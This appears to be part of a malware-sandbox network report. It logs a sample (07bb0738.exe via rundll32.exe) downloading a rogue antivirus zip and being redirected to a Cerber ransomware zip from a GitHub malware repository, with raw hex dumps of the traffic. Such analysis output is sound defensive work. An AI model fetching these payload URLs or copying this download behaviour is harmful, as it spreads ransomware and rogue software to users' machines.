                                                                                                                                                    2022-09-29 12:59:26 UTC37195INData Raw: 89 b6 30 ac c3 6b 94 d7 3b ed 41 c1 12 ae 2c b5 b8 01 71 30 2d 00 30 b9 7e da e0 84 72 55 2f 20 76 38 d3 21 34 b0 12 18 4e 60 36 7d 94 dc 11 56 bc da b7 eb 42 72 21 26 58 91 d3 cd 36 47 49 18 41 8e 7e a6 f5 66 57 e1 6d f4 6f 75 88 f5 f5 ff a8 42 ea 94 3d b7 20 2a 8d be 7f 23 a1 dd 38 40 0b fe 41 73 ac 84 d9 be b3 c5 2d 87 63 f3 3c c5 47 06 f0 4d 1a 8b 88 1f 63 f1 37 f3 e3 a2 65 1a 0e 40 41 65 c9 5e 5d cc 5f c5 ac 86 3a bc 1b 02 9d 77 26 77 3d f8 3a 73 35 fa d8 7e 62 57 ee 1b 81 3a d2 b8 af 8a 93 cf 93 61 b1 a0 90 a3 01 f0 65 75 67 09 bf ac 53 bb 67 ad 34 3b 29 c0 b3 1f e0 c7 d3 56 3d c4 2f 60 a6 5c 1f d2 56 ce 91 ce 32 e1 ea bb db 56 0b 27 5e 68 4f 5e e7 af 28 96 8d 8c b5 13 bb 45 d1 35 01 9e d8 89 9f a2 bc b9 d6 25 05 bb 96 e9 71 25 70 21 0a ac 9c 77 af
                                                                                                                                                    Data Ascii: 0k;A,q0-0~rU/ v8!4N`6}VBr!&X6GIA~fWmouB= *#8@As-c<GMc7e@Ae^]_:w&w=:s5~bW:aeugSg4;)V=/`\V2V'^hO^(E5%q%p!w
                                                                                                                                                    2022-09-29 12:59:26 UTC37211INData Raw: 9e 49 1c f7 ea 70 93 50 03 4e 28 9d af f6 d8 4f c7 63 d2 08 11 97 01 20 60 32 1c 36 fb 59 8b 09 7a 4d 45 d9 52 ef b1 0a 9e 6a f0 85 e8 76 0b f6 2e 6f 51 57 b3 90 e9 b1 78 26 87 b3 83 7c f7 64 8d b9 95 64 9b 0a 6c 72 62 bd 00 0e e1 2c 9f 25 d6 13 42 13 0a 89 cf 8f b3 bf 4c 70 36 a2 3b 96 e6 35 1d ea 18 b3 1e 32 87 85 5b 48 b5 52 d7 85 6f 06 c0 c8 9d 5a a1 c8 10 ec 2b 04 34 e1 77 46 5c 29 10 63 ba 90 e9 54 c1 4e 32 c8 29 0b 5a 8c 8c 42 79 bd 11 1b a3 6f 89 8d 5a e0 20 62 30 9b 2e 9c 73 90 ab 30 c3 43 75 77 22 64 41 18 fd 6c 64 6d 1d 89 ad d3 eb f4 31 89 71 4a cd 3f e7 70 e7 b0 39 cd 6c 41 af be a9 5c ea 28 0c fe 28 d4 15 d8 eb 06 8f da 3e bb 08 44 cb 89 0c 5b 2d b6 40 37 14 fd 8d 42 9a 9d ca 76 21 cf 8a 8b 78 c7 f5 f2 9b d5 1a ff 69 31 ff f7 68 8d 12 f8 f3
                                                                                                                                                    Data Ascii: IpPN(Oc `26YzMERjv.oQWx&|ddlrb,%BLp6;52[HRoZ+4wF\)cTN2)ZByoZ b0.s0Cuw"dAldm1qJ?p9lA\((>D[-@7Bv!xi1h
                                                                                                                                                    2022-09-29 12:59:26 UTC37227INData Raw: 59 9f 07 f2 ad 19 cb e3 bf 87 77 a8 77 01 b7 24 0d eb 85 b6 9d 6e ce 21 d6 6c df de b5 d0 44 29 58 1c 25 be 13 2a 81 9c 11 70 22 21 21 87 f0 d0 37 b7 92 98 ee 1c 33 d3 7d a2 95 ff 41 e4 bd 9c ff b1 0d 11 a7 77 50 80 96 bf 30 96 84 30 25 bb 98 5b a8 8a 1a 9c a7 b0 60 18 c0 58 8d ed 59 27 0e 9b 01 c2 a3 80 bd 76 d3 2d 19 72 03 a9 1a 69 e7 40 bc b0 4d 73 af ff 55 e6 f9 03 21 51 26 95 13 f8 c9 44 20 9e 1a 61 4e d7 59 ff 33 7a 41 89 2c 67 93 22 40 9e 35 ef 32 87 71 d1 38 e4 98 a8 e1 5e a9 af cd 69 48 36 db e7 f3 65 a7 42 74 61 b1 35 d3 06 3b 72 28 a8 e5 2e 91 c2 1a 5d 2a 18 3a e2 4d ce d5 bb 03 07 0a 6e 74 96 5a b8 b4 d5 b0 7c c0 a4 d1 d9 2a e7 13 e7 1e fa ca 91 b1 fd 56 3d 8e 6a c9 13 7b 09 4d 0d 43 bc 0e 8c 32 4c 84 6b cd 7f ae 2b 54 2f f8 0f a2 f5 99 ad 64
                                                                                                                                                    Data Ascii: Yww$n!lD)X%*p"!!73}AwP00%[`XY'v-ri@MsU!Q&D aNY3zA,g"@52q8^iH6eBta5;r(.]*:MntZ|*V=j{MC2Lk+T/d
                                                                                                                                                    2022-09-29 12:59:26 UTC37243INData Raw: bf 1d 3c d1 f8 49 be 1c 21 8c 4f 76 c9 95 df 28 51 36 d0 2f 52 27 2f d5 ff 6d 64 29 e9 87 14 b1 58 6c 2b c3 25 8b ec cd 01 bb f1 be 29 a5 ea 6d 0b b9 bc 92 f8 e7 e8 94 fa 2b 55 e5 83 25 10 b1 0f 03 8e 04 37 7f 63 7d a9 9a 3e 07 e2 dd ea f4 df 1c c1 6a 83 7c 37 4a 98 61 60 b7 a0 86 e8 0d 72 f5 cf df 41 fc b0 5d 8c b7 0f 05 f5 50 a9 e0 26 e5 cb 06 a7 27 e9 83 53 dc 66 71 e9 f4 d8 73 f5 21 ab d5 e0 5c 84 5a 14 fd e5 4a bd 4a 55 56 6f 34 02 3c 37 45 d7 dc 97 e1 e3 54 d8 e4 b9 10 89 4e ec 07 22 31 2d 35 ee 0e eb 43 2a 79 ea bf 9e 88 6c 3e 9e 50 f4 c6 35 b1 94 f9 58 32 3f da 95 a5 26 5a 58 a3 11 9f 5a a8 04 1f 42 41 bb 3b cf a0 28 6f 70 fb 00 d1 57 e2 9f 4b 49 af 10 2e a1 da 02 32 38 80 a8 a6 1b a1 74 3d 41 67 6f 2a fe 16 21 a9 34 60 ca 20 33 c0 bb 32 b4 74 7b
                                                                                                                                                    Data Ascii: <I!Ov(Q6/R'/md)Xl+%)m+U%7c}>j|7Ja`rA]P&'Sfqs!\ZJJUVo4<7ETN"1-5C*yl>P5X2?&ZXZBA;(opWKI.28t=Ago*!4` 32t{
                                                                                                                                                    2022-09-29 12:59:26 UTC37259INData Raw: bb 5f 81 8d 58 19 20 f1 a2 4e ee 43 e1 09 3f f2 77 19 f0 f0 6f a6 53 f5 da 40 3e 97 cc 8d 1e e0 fe 52 b6 0a 2a 94 8d 76 07 17 ac 2f 28 af b6 7d a5 54 e2 c4 e7 10 88 b6 69 a8 41 14 97 27 ca ba ce 78 f3 b5 28 41 25 7f db b8 b8 6b 04 bd 09 86 dc 1d 96 d8 63 fb 4c ab 1b e3 4f 61 a6 53 72 de e6 2a 33 cf 87 cb f6 c8 1d 49 5e f0 6f b4 1b 01 63 63 4b ec 6a 90 00 a7 ed e9 d0 c5 f7 01 2e 03 9b dc 28 c9 9c a4 9c 0e dd ea 7b d2 ab 16 98 82 60 55 59 8b 0a 9c ed c3 08 7e 2e 00 a7 64 57 71 f6 5e 87 93 0d f7 59 79 5f c4 43 33 a0 ac bf 5e 30 f2 39 fa c4 34 2b ef 15 7f b7 50 6b 57 a6 e2 03 ac 50 be a6 fe b9 19 2d 72 f0 94 5d f2 04 aa cc bd 5d 37 03 29 63 db 14 b1 4f 24 5d 40 c5 3b 29 2f c0 2c ed 07 c9 81 24 d7 f5 58 19 ec 73 35 72 6b fb df 86 b6 1e e9 2b 46 89 ca 48 df f2
                                                                                                                                                    Data Ascii: _X NC?woS@>R*v/(}TiA'x(A%kcLOaSr*3I^occKj.({`UY~.dWq^Yy_C3^094+PkWP-r]]7)cO$]@;)/,$Xs5rk+FH
                                                                                                                                                    2022-09-29 12:59:26 UTC37275INData Raw: 87 b7 fa d7 50 3e b6 2b 72 7d 4c b4 04 04 fa 3d ea e4 b6 1b 1b 73 66 a0 db 52 fa e2 79 95 e8 9d 81 f6 81 80 67 f0 7a 4f 18 d0 d0 4f af 9c 98 84 29 1f 03 af 71 3d e6 cf 45 b8 93 b3 25 e8 8b 1f 83 4c 7e 64 70 c3 31 58 18 2f 92 f3 e4 7e 07 f2 51 ab 1a 8d 4e e2 0f ee 07 42 74 fa 13 e5 b2 ba 27 f2 93 49 55 ca fc 70 5b bd 4f 05 37 94 45 10 0e 82 7b 8a dd 99 78 24 fc 1b ec a9 82 12 95 4f 89 3f 35 f7 15 cc d7 f4 f2 a5 04 b8 6b 29 9a 5d d7 e3 29 78 85 a2 25 ba e2 83 51 fe ad 5e 79 0f 30 22 78 2f dc 68 7a 2a d2 95 2d 9f 49 47 c0 81 bf be 33 47 f2 1e 09 8e 2d 29 e2 81 bf 13 6c c4 5c ad 42 2e cd e1 64 77 1d 94 d5 30 40 b0 4a cd 8b ef f7 3e 70 98 b5 33 5a 44 f4 bd 82 2e b0 c5 a7 9c cd 0c c8 cd 35 5e 33 ea 83 db 35 00 33 93 41 45 33 fa bb f0 8b ac 17 b1 a4 9a 2d 9a 27
                                                                                                                                                    Data Ascii: P>+r}L=sfRygzOO)q=E%L~dp1X/~QNBt'IUp[O7E{x$O?5k)])x%Q^y0"x/hz*-IG3G-)l\B.dw0@J>p3ZD.5^353AE3-'
                                                                                                                                                    2022-09-29 12:59:26 UTC37291INData Raw: a2 c8 eb 0c 07 27 8d b2 08 80 0b 6a 6a 8e c1 44 91 59 dc ca 20 ab 72 3d de 45 7d 99 96 ea 2b 27 ca 6f cc 22 86 e8 c5 41 b3 86 75 60 2d 5a 0d 66 d2 c6 75 d7 53 9e 1e 17 12 1e 80 19 ef f9 82 05 c0 83 80 40 a1 d9 9e 28 8a 4d 92 f6 e8 b0 52 0c 64 d4 93 bd 91 af 76 35 ac 69 e0 16 ed 46 09 07 e4 17 e0 a6 e9 49 fd 19 51 9d 0c 11 e0 46 24 06 3c d3 a5 f8 f3 fb a0 bb b3 4b 20 3a 8a 35 2c 75 5f f1 9e ce 71 78 20 bc 21 47 bc 0d 2b 30 44 23 27 e2 ce 34 4c 39 30 cd 34 81 5e a4 cf f9 2d ca d2 fd d0 96 8c 18 f9 c9 f0 96 12 86 cd 35 28 9c f6 30 3d b6 a3 f2 32 02 4a 1c 90 b7 1d 70 b3 68 cc 2d da ed 54 db d9 ef 3b aa 2e 6b a6 3c bc f6 92 65 c2 a8 39 d5 cc a7 5d 07 36 1e 21 6c b5 ed 68 a5 13 07 05 69 a2 37 92 c6 d6 b3 5e 50 12 e4 64 a3 ce e9 4e 6b c2 12 64 9f c7 83 d0 69 4b
                                                                                                                                                    Data Ascii: 'jjDY r=E}+'o"Au`-ZfuS@(MRdv5iFIQF$<K :5,u_qx !G+0D#'4L904^-5(0=2Jph-T;.k<e9]6!lhi7^PdNkdiK
                                                                                                                                                    2022-09-29 12:59:26 UTC37307INData Raw: e8 4f 36 57 ab a8 7b 4d a8 4a 92 a4 d2 4d c3 1f 97 ad 18 d0 8e 6a e0 1b eb b9 fb 1f 37 7e 16 26 64 2e 71 06 c5 40 94 98 cf 32 2d 03 3a 3b 57 1f e9 89 af 57 0d fb 9d 42 c5 22 40 d0 df 7e c5 6a de 92 72 6e 1b 45 3a 56 be 8c cb 15 56 44 1f 10 f0 82 c6 dc 45 5e 9e 7e 26 ba d8 66 1e 2e c4 d8 d2 16 6f 5f eb e8 79 54 08 35 c0 c7 66 81 cb e9 48 c6 82 ce 16 0c bd f4 b6 b7 2f bf d1 72 1b 39 46 b6 5a 1a f4 86 11 1d 4e 8b 99 6d 23 d2 28 4b 05 dd 48 9f b9 61 5c 76 ea 87 71 37 48 d3 b6 1f 51 58 bf 96 46 a7 27 c5 41 f5 73 a5 1a 5f be d9 8e 32 db 3b 70 ec 3d be 7d eb e3 ba a8 bc 8a 02 f5 5f db db 96 d6 4b d5 2b de 94 5c 76 9f db 9a 3a 98 bf f6 cf 77 35 a8 e3 d7 58 d4 65 04 0e ae 63 ee c1 12 33 88 0c 55 74 85 ca 43 23 8f de d9 af 52 10 b2 47 ae e4 23 41 1f ca 61 96 60 b5
                                                                                                                                                    Data Ascii: O6W{MJMj7~&d.q@2-:;WWB"@~jrnE:VVDE^~&f.o_yT5fH/r9FZNm#(KHa\vq7HQXF'As_2;p=}_K+\v:w5Xec3UtC#RG#Aa`
                                                                                                                                                    2022-09-29 12:59:26 UTC37323INData Raw: a5 40 92 4b 56 b1 05 a4 1e 17 91 90 ce 0b 71 44 28 89 06 da f6 21 f7 c6 76 ef fb bd 0b 4f cf 96 4e 02 ce d6 b3 1f 8e 5d 3c de 10 73 26 7d ab a6 6e 7d 6c 7b 2a 9f da 7d 6e 8a 41 94 01 5e a3 e9 50 10 2f f8 99 76 2a 25 96 f6 fd 7b 53 df 59 ef 0c e4 0b 0d 25 62 ae be e8 38 29 8a 64 88 a7 31 76 9e 93 47 87 06 85 c7 37 4d 6f c8 f2 5e 8a 8e 35 b1 1e f3 53 3c 0c 81 51 a7 9d d8 5b aa 58 c7 c9 dd 31 19 88 d6 32 22 d5 ea 91 12 4c 2a 5f c9 80 19 7f 6c 61 78 26 60 ec 79 59 16 74 f7 2f 98 7e 99 3c 95 cc 3f c3 2f 1f fe 93 99 9d 3c 96 98 c7 ad 48 09 91 a9 08 dd 9a b9 5d 19 e3 68 99 25 c0 0b 9a 28 f7 48 9f a3 56 22 ba 38 f7 c1 14 39 01 0e 6c 2f 43 28 c0 8b 79 8a fd 3b 65 39 2c 75 3f 1c e7 76 82 29 fb 39 f2 9e 27 72 c9 09 6f f5 56 b8 c1 ce c0 24 10 ad 4d d4 3d 2b 12 03 b5
                                                                                                                                                    Data Ascii: @KVqD(!vON]<s&}n}l{*}nA^P/v*%{SY%b8)d1vG7Mo^5S<Q[X12"L*_lax&`yYt/~<?/<H]h%(HV"89l/C(y;e9,u?v)9'roV$M=+
                                                                                                                                                    2022-09-29 12:59:26 UTC37339INData Raw: 09 18 03 27 1e 0a 7c 26 c0 31 5f 29 da 02 15 ac f4 71 ad cb bd 31 c4 1a 60 78 1c 73 dd 3f 99 d7 30 55 7f ae 59 ad f4 7d 39 df e3 e9 57 56 3b aa c9 cc 89 a5 df cd 7a e5 66 50 04 39 1e cf 22 e1 a6 1e ee 41 25 b8 f8 47 38 5e ae da f9 2a db e5 1c bc aa 40 47 77 cb ab f2 3d fc 96 34 d3 8a 19 39 17 91 26 12 89 21 82 24 a5 64 fb 39 2e fa 75 4d 6b b9 0d b5 42 f1 f4 34 45 1e 17 38 5d 81 ec c4 78 b1 8b f0 ec 4e d6 93 54 ea 65 b6 ac 04 fa a8 98 38 af 21 76 25 43 19 99 2e b3 72 53 41 07 d4 21 b4 91 75 91 d8 f7 f1 45 0a 15 f5 bc 9a 92 55 1b 9d 39 9d 5f 59 f6 35 5a 92 d6 2f f6 b9 62 b3 d1 6e 78 64 95 e8 8d 3b 4c 1b 7b d3 e7 1f 5d 84 57 e3 5f 63 31 ff c2 32 b1 d7 7e b3 d2 51 5a 2f ba 9b bc 5b ea 92 2a 74 8d 0d 1b 71 ae 05 48 1f 3b b8 43 47 2c 62 a0 d7 82 d6 5b a1 f5 ed
                                                                                                                                                    Data Ascii: '|&1_)q1`xs?0UY}9WV;zfP9"A%G8^*@Gw=49&!$d9.uMkB4E8]xNTe8!v%C.rSA!uEU9_Y5Z/bnxd;L{]W_c12~QZ/[*tqH;CG,b[
                                                                                                                                                    2022-09-29 12:59:26 UTC37355INData Raw: 53 99 f8 ff f8 3b 8f 33 0d 75 66 75 75 50 30 91 ba 08 01 d4 d0 42 c7 a2 8f fa 9b 36 8f 47 8c f1 47 58 ef 46 a0 f2 01 34 41 15 d4 c4 57 ad fc 76 22 62 98 f8 f0 56 42 bd 8c 03 34 e2 5a 48 e2 75 bb 35 7b f2 60 9f cf e6 44 5b a1 14 da ec 89 ee de 4c e7 16 ab 8e ee 4c bf 7e 36 ae 52 a5 1d f3 f0 29 ee 9d fd 0f 25 1f 1e 8a e0 f8 b8 90 53 f3 f5 5b 06 24 3c 87 64 09 ee f8 65 82 21 a5 9a 19 ab 97 3d 3b 27 61 07 55 5f 2d eb da 05 40 7e 95 3a e9 c5 ed c3 5a 46 3b f3 c8 07 5d e8 79 a4 d8 7a df 30 16 ef 1c e8 59 de a0 5a c9 e4 71 17 63 bf 0d a1 f6 cd 68 a2 4e 8e d1 d3 ab 2a 29 26 92 98 21 70 62 55 86 d6 be c5 85 f2 ce 64 e8 7e 01 b0 8f 95 ce 8e 2a 89 50 af 1d 79 33 b3 9a f7 d0 7a d8 a7 29 69 c0 08 e0 ee 36 5a 6d 19 6a c0 03 25 15 01 4a d9 79 16 5c d6 f6 80 b3 85 b5 03
                                                                                                                                                    Data Ascii: S;3ufuuP0B6GGXF4AWv"bVB4ZHu5{`D[LL~6R)%S[$<de!=;'aU_-@~:ZF;]yz0YZqchN*)&!pbUd~*Py3z)i6Zmj%Jy\
                                                                                                                                                    2022-09-29 12:59:26 UTC37371INData Raw: 62 3d dc 13 9d 7e 47 ff 53 08 bd 5b c8 20 96 00 1e 02 cb 58 b9 7a a9 fb ed 36 41 86 9d be 81 1c bc 62 c1 05 75 0c 04 2e d4 0b b6 90 eb e3 6e 22 60 c5 2e 46 e9 57 a7 90 4f 5d 9c fc 52 78 07 73 7d b8 d1 b4 92 5e c1 10 af 57 2e 57 86 62 9e 79 61 ca ca 45 2a 5f 55 e9 09 ea d5 88 c5 16 b3 66 cc bb 5e dd 2b 53 30 34 c2 24 f3 f3 7d ef 4a 83 a8 4f 6d e2 d1 e2 06 fd cc f3 7d 19 81 24 3b c5 1a da 0c f5 2e c4 35 a7 11 0f 05 cb c9 90 a7 5d 12 37 39 26 d4 8c 7e 57 4d 36 a1 69 ba ec 23 6e 67 fa bd 6a 95 86 01 f9 60 7e 86 44 76 c7 5c 87 bf c2 08 2c f5 52 0f aa c8 da 9c d2 8b 95 99 08 e5 4b 97 89 9e 53 ab 65 15 47 41 b6 53 7a 3b 32 ba d5 f7 ca 8c f9 17 42 bb 29 0a fe 99 09 74 69 56 5d a2 2f 7c dc d9 dc 65 a1 8a 22 8a 1a 12 5a 8a b8 7b e0 39 9a 78 f0 ce 8d 49 5e 0c b1 1b
                                                                                                                                                    Data Ascii: b=~GS[ Xz6Abu.n"`.FWO]Rxs}^W.WbyaE*_Uf^+S04$}JOm}$;.5]79&~WM6i#ngj`~Dv\,RKSeGASz;2B)tiV]/|e"Z{9xI^
                                                                                                                                                    2022-09-29 12:59:26 UTC37387INData Raw: bb 93 b6 3c 46 24 e5 34 c9 86 9b ee 04 cb ad 75 09 5a 32 4d 33 f1 6a 55 52 20 c0 1c 71 68 e2 ce bb 16 de 9e 74 84 9a 7b 98 4f 71 26 85 cf 36 38 65 eb f7 56 d9 66 40 e2 87 03 f2 32 63 d0 99 40 dc 92 a9 8b 3e 41 73 6c 09 09 1a 16 6a 02 b8 0f 95 68 43 a3 e2 a1 40 cc 10 ad 90 f2 7d d6 f4 d3 a7 e8 d1 e8 7b 42 76 63 47 0f 43 c1 fe 51 b6 c8 f7 b9 c8 1c 69 0a bd 1f da 57 74 6b a9 ec 77 97 eb 79 84 40 5f c1 d7 e9 7f e5 38 bd 98 a5 29 66 ff f8 f7 59 31 13 27 d7 90 b3 38 73 80 c6 d2 ce 7c 7a 8b c9 34 ee 58 f1 62 ed ca 41 b5 ce 88 3b ef fe f1 54 b5 62 d8 39 24 67 47 b0 3a f8 1c 44 4f 90 76 46 43 97 ba 22 80 4c 1e 5c d1 aa cc e7 43 68 23 58 a5 7d b9 b8 7a 49 68 95 e3 bf 0b 56 c4 aa 47 72 6a b1 8b 7b 50 c3 a9 e9 48 7d 52 91 99 e5 13 84 c2 ae 0d ec 95 9a 88 c8 5b d2 5e
                                                                                                                                                    Data Ascii: <F$4uZ2M3jUR qht{Oq&68eVf@2c@>AsljhC@}{BvcGCQiWtkwy@_8)fY1'8s|z4XbA;Tb9$gG:DOvFC"L\Ch#X}zIhVGrj{PH}R[^


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    137192.168.2.349776140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:26 UTC37397OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    138140.82.121.3443192.168.2.349776C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:26 UTC37397INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:26 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:26 UTC37397INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    139192.168.2.349777185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:27 UTC37399OUTGET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    14140.82.121.3443192.168.2.349714C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC702INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:14 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:52 UTC703INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    140185.199.108.133443192.168.2.349777C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:27 UTC37399INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 784070
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "5601906f462292c534f39537ca64d8cda4306ae676428837f668f0e7370b064a"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: F256:3F37:F623C5:105CF59:6335936B
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:27 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6966-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456367.027270,VS0,VE191
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 2bf4d7d75fa616f9c8908d2cf07d41e77aa0a297
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:27 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:27 UTC37400INData Raw: 50 4b 03 04 33 00 01 00 63 00 73 14 a7 3a 00 00 00 00 fe f5 0b 00 73 0b 0c 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 41 56 32 30 30 38 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2c e5 a7 6a 4d 02 19 ad e4 db 0e 60 f4 6e 12 95 d3 5b c6 37 07 fe 19 c6 cd ed c5 04 33 33 cc 8b 59 b9 2d 06 87 fe ef 3f 78 19 73 6f b0 58 5f 9b 21 73 23 37 6c 4e bc 8a 2a 2e 5a 98 e7 35 af cb 0d 36 49 ad 79 e7 76 4f d1 96 71 3e dd 31 11 19 b5 e2 b9 3e eb 4a fe 8f 12 67 d4 dd 67 1f e7 5b 88 8d b1 6f 1a e5 98 1f a4 62 72 90 26 00 0e 23 11 04 d9 27 6b 03 55 90 a9 62 bc a9 56 7e 57 9d 32 c3 0c ad 21 ca 9c bc 78 2c 09 c1 ff dd 21 1c af 38 bc 08 35 2c 7f a0 be fb 67 0f 77 5b ab 29 fb 3e c7 b3 02 35 98 0e 2d 5d 33 2b e1 8c fa f4 1b 04 2e 38 43 0b 17 be a4 b0 ac 12 f4 53 04 be
                                                                                                                                                    Data Ascii: PK3cs:sEndermanch@VAV2008.exeAE,jM`n[733Y-?xsoX_!s#7lN*.Z56IyvOq>1>Jgg[obr&#'kUbV~W2!x,!85,gw[)>5-]3+.8CS
